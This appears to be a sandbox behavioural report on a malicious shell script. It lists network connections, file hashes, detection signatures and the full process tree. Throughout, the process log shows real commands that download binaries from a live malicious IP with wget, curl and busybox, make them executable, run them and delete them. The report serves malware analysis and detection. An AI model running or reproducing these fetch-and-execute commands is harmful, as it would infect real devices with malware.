/usr/bin/wget

[wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/chmod

[chmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu

[./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/rm

[rm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.19:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:59

Reported

2024-10-18 03:01

Platform

debian9-armhf-20240729-en

Max time kernel

47s

Max time network

49s

Command Line

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A

Processes

/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

[chmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

[./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/rm

[rm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/wget

[wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/chmod

[chmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr

[./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/rm

[rm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/wget

[wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/chmod

[chmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu

[./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/rm

[rm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

